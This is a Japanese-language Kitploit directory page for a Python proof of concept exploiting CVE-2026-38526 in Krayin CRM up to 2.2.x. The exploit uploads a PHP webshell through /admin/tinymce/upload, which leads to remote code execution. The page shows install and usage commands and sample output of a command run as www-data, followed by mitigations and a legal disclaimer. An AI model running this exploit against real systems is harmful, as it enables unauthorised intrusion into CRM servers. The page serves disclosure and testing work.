Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-38526 — Krayin CRM <= 2.2.x の CVE-2026-38526 を悪用する Python PoC: /admin/tinymce/upload を介した認証済み PHP webshell アップロードによりリモートコード実行に至る。 | Kitploit
ツール/GitHubGitHub/harry178945/cve-2026-38526
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテストレッドチーミングリモートアクセスツールペイロード開発
GitHubharry178945/cve-2026-38526

CVE-2026-38526

Krayin CRM <= 2.2.x の CVE-2026-38526 を悪用する Python PoC: /admin/tinymce/upload を介した認証済み PHP webshell アップロードによりリモートコード実行に至る。

リポジトリを見る
2日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-38526 — Krayin CRM ≤ 2.2.x 認証済みRCE

⚠️ 法的警告:このコードは教育目的 および許可されたテスト(CTF、バグバウンティ、プライベートラボ)専用として提供されています。 作者は違法な使用に対して責任を負いません。

説明

Krayin CRM(Webkul)≤ 2.2.x はエンドポイント /admin/tinymce/upload を公開しており、認証済みユーザー(低権限であっても)が 拡張子の検証なしにファイルをアップロードできます。ファイルは その後 storage/ フォルダから配信され、PHPコードの 任意実行が可能になります。

  • 種類:任意ファイルアップロード → RCE
  • CVSS:9.9(緊急)
  • 認証要件:あり(有効なアカウントであれば何でも)

インストール

git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt

使用方法

python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'

オプション:

オプション説明
-t, --targetターゲットのルートURL
-u, --userKrayinアカウントのメールアドレス
-p, --passwordパスワード
-c, --command実行するコマンド(デフォルト:id)
--login-pathログインパス(デフォルト:/admin/login)
--upload-pathアップロードパス(デフォルト:/admin/tinymce/upload)
--timeoutHTTPタイムアウト(デフォルト:15)

例

$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
    -u [email protected] -p 'N27xh!!2ucY04' -c 'id'

[*] http://billing.nexus.htb/admin/login でCSRFトークンを取得中
[*] ログインフォームを送信中
[+] 認証に成功しました
[*] http://billing.nexus.htb/admin/tinymce/upload 経由で x8f2k1ab.php をアップロード中
[+] ウェブシェルにアクセス可能:http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] 実行中:id

============================================================
[+] コマンド:id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

緩和策

  • Krayin CRMを修正バージョンに更新する。
  • アップロードされるファイルの拡張子を制限する(ホワイトリスト)。
  • storage/ および uploads/ フォルダ内でのPHP実行を禁止する。
  • CRMアカウントに最小権限の原則を適用する。

免責事項

このプロジェクトはセキュリティ研究目的で公開されています。事前の書面による 許可なくシステムに対して使用することは 違法であり、固く禁止されています。

ツールをダウンロード